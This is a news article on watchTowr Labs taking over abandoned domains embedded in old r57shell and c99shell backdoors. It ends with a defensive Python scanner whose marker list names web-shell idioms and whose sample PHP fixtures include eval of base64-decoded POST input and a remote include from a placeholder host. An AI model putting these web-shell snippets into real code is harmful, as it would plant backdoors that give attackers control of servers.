
Researchers at watchTowr Labs discovered more than 4,000 active backdoors on compromised systems of governments and universities around the world by taking over abandoned domains and abandoned infrastructure.
The watchTowr Labs team conducted extensive research into abandoned domains that were embedded in hackers' backdoors. The idea was to take control of abandoned backdoors through which hackers had gained access to compromised systems. To do this, the researchers registered more than 40 abandoned domains that old web shells used to communicate with their operators.
After registering domains and redirecting traffic to their servers, the researchers discovered more than 4,000 active backdoors on various systems, including:
In addition, the team obtained data on the use of old, popular web shells such as r57shell and c99shell, which had built-in backdoors so that the hackers using them could in turn be controlled by other hackers. The identified backdoors made it possible to observe how the hackers infected systems and to gain access to those systems with minimal effort.
A similar technique had been used before, when the watchTowr team researched abandoned .MOBI domains, which allowed them to obtain trusted TLS/SSL certificates. This led to global changes in certificate issuance practices, initiated by Google.
Web shells such as r57shell and c99shell have historically been widely used by hackers and cybercriminals for follow-up attacks after the initial breach of a server. They often contained hidden backdoors that allowed the web shell's authors to access compromised systems even if the original hacker had password-protected the shell.
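As an added defensive example (not code from watchTowr's research), the following script scans PHP sources for markers of the shell families named above and lists the external hosts they reference, so an administrator can check whether those domains have lapsed and could be registered by someone else. The marker strings and the sample files are constructed assumptions; tune the markers for your environment.

```python
import re
from typing import Dict, List, Set

# Assumed markers: names of the shell families discussed plus generic
# web-shell idioms. These are constructed examples, not a full signature set.
SHELL_MARKERS = ("r57shell", "c99shell", "eval(base64_decode(", "passthru(", "shell_exec(")
# Captures the host part of any http(s) URL found in the file.
HOST_RE = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.IGNORECASE)


def scan_file(name: str, content: str) -> Dict[str, object]:
    """Flag a PHP file that looks like a web shell and list the hosts it references."""
    lowered = content.lower()
    markers = [m for m in SHELL_MARKERS if m.lower() in lowered]
    hosts = sorted({h.lower() for h in HOST_RE.findall(content)})
    return {"file": name, "suspicious": bool(markers), "markers": markers, "hosts": hosts}


def referenced_hosts(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each host referenced by a suspicious file to the files that reference it."""
    out: Dict[str, Set[str]] = {}
    for name, content in files.items():
        result = scan_file(name, content)
        if result["suspicious"]:
            for host in result["hosts"]:
                out.setdefault(host, set()).add(name)
    return {host: sorted(names) for host, names in sorted(out.items())}


# Constructed sample files; the hostnames are placeholders, not real indicators.
SAMPLE_FILES = {
    "uploads/img.php": "<?php /* c99shell v1 */ $u='http://updates.example-shell.test/ver.txt'; "
                       "eval(base64_decode($_POST['x'])); ?>",
    "inc/helper.php": "<?php function esc($s){ return htmlspecialchars($s); } ?>",
    "tmp/.cache.php": "<?php // r57shell\n@include('https://old-cdn.example.test/r57.txt'); ?>",
}

if __name__ == "__main__":
    for host, files in referenced_hosts(SAMPLE_FILES).items():
        print(f"{host}: {', '.join(files)}  <- verify this domain is still registered and trusted")
```

The output is a review list: each host that a suspicious file reaches out to or includes code from, together with the files that reference it.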
The watchTowr Labs study highlights the danger of abandoned infrastructure and abandoned domains, which can be used to take control of compromised systems. The company encourages organizations to regularly inventory their assets and keep them secure.